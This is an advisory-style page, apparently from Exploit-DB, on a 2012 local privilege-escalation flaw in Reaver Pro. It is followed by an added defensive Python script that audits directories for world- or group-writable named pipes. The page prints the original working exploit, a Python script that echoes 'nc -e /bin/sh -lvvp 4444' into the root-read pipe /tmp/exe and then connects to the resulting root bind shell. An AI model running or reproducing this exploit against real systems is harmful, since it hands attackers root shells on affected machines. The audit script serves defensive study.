Vendor: Reaver Pro
By: Insecurety Research
CVSS: 7.2 (HIGH)
Local Privilege Escalation
CWE: 264
Product Name: Reaver Pro
Affected Version From: Reaver Pro
Affected Version To: Reaver Pro
Patch Exists: NO
Platforms Tested: Linux
2012

Reaver Pro Local Root

Reaver Pro is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. The exploit code creates a bindshell on port 4444 and connects to it.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55725/info

Reaver Pro is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. 

#!/usr/bin/env python
import os
print """
          Reaver Pro Local Root
   Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
    Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")
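
A defensive check for the flaw described in the exploit's banner, a named pipe under /tmp that any local user can write to. This is an added example, not part of the original advisory or exploit; the function names and the sample files it builds are constructed for illustration.

```python
#!/usr/bin/env python3
"""Audit a directory for named pipes that unprivileged local users can write to."""
import os
import stat
import sys
import tempfile


def audit_fifos(directory):
    """Return (path, octal mode, owner uid, reasons) for each risky FIFO in directory."""
    findings = []
    for entry in os.scandir(directory):
        st = entry.stat(follow_symlinks=False)  # lstat: never follow a planted symlink
        if not stat.S_ISFIFO(st.st_mode):
            continue
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if reasons:
            mode = oct(stat.S_IMODE(st.st_mode))
            findings.append((entry.path, mode, st.st_uid, reasons))
    return sorted(findings)


def make_constructed_sample(root):
    """Constructed test data: one open FIFO, one owner-only FIFO, one regular file."""
    for name, mode in (("exe", 0o666), ("private", 0o600)):
        path = os.path.join(root, name)
        os.mkfifo(path)
        os.chmod(path, mode)  # chmod explicitly; mkfifo's mode is masked by umask
    plain = os.path.join(root, "notes.txt")
    open(plain, "w").close()
    os.chmod(plain, 0o666)  # writable, but not a FIFO, so it must not be reported
    return root


if __name__ == "__main__":
    # With no argument, run against the constructed sample instead of a live system.
    target = sys.argv[1] if len(sys.argv) > 1 else make_constructed_sample(tempfile.mkdtemp())
    for path, mode, uid, reasons in audit_fifos(target):
        print(f"{path} mode={mode} uid={uid}: {', '.join(reasons)}")
```

Run it with a directory argument such as /tmp on a host under review. A reported pipe owned by uid 0 warrants a look at what the process reading it does with the data it receives.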